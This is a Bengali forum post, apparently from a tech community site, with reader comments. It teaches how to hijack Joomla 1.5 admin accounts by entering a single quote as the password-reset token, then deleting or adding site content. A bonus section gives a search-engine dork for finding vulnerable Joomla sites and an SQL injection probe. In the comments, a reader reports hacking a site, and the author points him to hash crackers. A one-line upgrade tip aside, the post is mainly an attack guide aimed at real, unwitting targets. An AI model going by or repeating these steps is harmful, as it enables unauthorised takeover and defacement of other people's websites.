অনেকেরই দেখি হ্যাকিং এ প্রচণ্ড আগ্রহ তাই তাদের জন্য একটু টুকটাক লিখতে বসলাম আরকি। /আজকে আমি দেখাব জুমলার একটা সহজ Exploit. জুমলা সপর্কে আমরা সবাই কম বেশি যানি। জুমলা একটা CMS । আরো জানতে এই ঠিকানয় যানঃ http://joomla.com
যদি না জানেন তাহলে আপনার এই টিটোরিয়াল পড়ে কোন লাভ হবে না। কারন আপনি যা হ্যাক করতে চান তার সম্পর্কেই তো আপনি যানেন না।
প্রথমে একটা সাইট বের করুন যা জুমলা ১.৫.x দিয়ে বানানো। কারন এটা শুধুমাত্র জুমলার ১.৫ এর সকল ভার্সন এর ক্ষেত্রেই এই Method টা প্রজেয্য । অন্যান্য ভার্সন এর ক্ষেত্রে অন্য Exploit ব্যাবহার করতে হবে। ধরি একটা সাইট পেয়ে গেলেনঃ
এখন এই সাইটের এ্যডমিন প্যানেলঃ
http://aaaaaa.com/administrator
মানে আপনার প্রাপ্ত সাইটের শেষে /administrator লিখলেই পেজে যাবেন এ্যডমিন প্যানেল। এখন এখানে লগিন করতে আপনার Username এবং Password প্রয়োজন। এখন দেখব কিভাবে আমরা Username এবং পাসওয়র্ড পাব। J
আপনার প্রাপ্ত সাইটের শেষে এইটা লিখুন।
/index.php?option=com_user&view=reset&layout=confirm
তাহলে দারায়ঃ http://aaaaa.com/index.php?option=com_user&view=reset&layout=confirm
এখন আপনি পাসওয়র্ড রিসেট পেজ এ আছেন। এখানে টোকেন এর জায়গায় শুধুমাত্র এই চিনহ টা দিনঃ (‘)
বন্ধনি বাদে। এই চিনহ টা দেওয়ার পর আপনাকে একটা নতুন একটা পেজ এ নিয়ে যাবে। ওইখানে আপনি নতুন পাসওয়র্ড দিতে পারবেন। এখন আবার এ্যডমিন প্যানেলএ ফিরে গিয়ে আপনার দেওয়া নতুন পাসওয়র্ড দিয়ে লগিন করুন। 😉 আপনি এখন এ্যডমিন প্যানেল এ। আপনি চাইলে ডিলিট করতে পারেন । কোন নিউজ যোগও করতে পারেন আপনার ইচ্ছা।
তবে যে সাইটে নতুন একটা পেজএ নিয়ে যাবে না অথবা যদি লেখা আসে Token Invalid
তাহলে বুঝবেন ওই সাইটের জুমলা ভার্সন ১.৫ না। আমি আবারও বলসি এটা শুধুমাত্র জুমলা এর ১.৫ ভার্সন এর ক্ষেত্রে প্রযেজ্য।
বাচার উপায়ঃ
এখন যদি আপনার কোন জুমলা ১.৫ এর কোন সাইট থেকে এবং এই টোকেন Exploit এ হ্যাক করার মত হয় তাহলে আপনি যা করবেন। জুমলার নতুন ভার্সন এ আপগ্রড করুন। জুমলার নতুন ভার্সন পেতে এই ঠিকায়ান যানঃ http://joomla.com নতুন ভার্সনে এই বাগ Fix করা হয়েছে।
[বোনাস]
এইটা জুমলার SQL Injection Exploit এইটা শুধুমাত্র তাদের জন্য যারা SQL Injection পারেন।
গুগলে গিয়ে সার্চ দিন : "Powered by joomla" inurl:link_id"
এখন যে সাইটগুলা আসবেতার শেষের দিকটা এরকমঃ ?act=story_lists&task=item&link_id=1
যেমনঃ http://aaaaaa.com/?act=story_lists&task=item&link_id=1
এসকিউএল এরর: http://aaaaaa.com/?act=story_lists&task=item&link_id=%5BSQLi]
যেমনঃ http://aaaaaa.com/?act=story_lists&task=item&link_id=1’ [শেষে একটা স্ট্রিং দিন]
সবাইকে ধন্যবাদ। এখন যদি কেউ না পারেন না তাহলে মনোজগ দিয়ে চেস্টা করুন। হ্যাকিংটা এমন না যে আপনি একদিনেই পুরা বস হয়ে যাবেন। এর জন্য দরকার প্রুচুর ধৈ্র্য এবং সময়।
--::Good Luck::Happy Hacking::--
===[মারুফ আলম]===
আমি মারুফ আলাম। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 9 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 16 টি টিউন ও 296 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 1 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।
uid=0(root) gid=0(root) groups=0(root)
অনেক ভাল টিউন—-আশা করি এখনও যারা জুমলা ১.৫ এ আছেন তারা অতি দ্রুত ১.৬ এ যাবেন। সতর্কবানীর জন্য আবারও ধন্যবাদ।
ভাইয়া অসাধারণ হয়েছে! আমি জুমলার একটি সাইট হ্যাক করে ইউজারনেম ও পাসওয়ার্ড সব কিছু বের করেছিলাম। কিন্তু পাসওয়ার্ডটি হ্যাস আকারে ছিল। অনেক চেষ্টা করেও হ্যাস ক্র্যাক করতে পারলাম। জুমলা,ওয়ার্ডপ্রেসের ক্ষেত্রে পাসওয়ার্ড মনে হয় সবসময় হ্যাস আকারে আসে। এর কোন উপায় আছে আসল পাসওয়ার্ডটি বের করার।
@খালিদ হাসান: এ জন্য গুগল এ গিয়ে সার্চ দিনঃ
joomla Hash Cracker
wordpress Hash Cracker এই রকম। আর টিউমেন্ট এর জন্য থ্যাঙ্কস
MD ABUL KALAM bhai amio apner satay ek mott – hacking na sikhiya hacking thakay ki bhabay bacha jay ta sikhan
@bcsf: আমার মনে হয় দুইটাই শিখা উচিত। তারপরও পোস্টেই বলা আছে কিভাবে এর থেকে রক্ষ্যা পেতে হবে।
অনেক সুন্দর টিউন,
আপনি যত্ন করে টিউনটি লিখেছেন বলেই অনেক সুন্দর হইছে,
আপনাকে ধন্যবাদ টিউনের জন্য।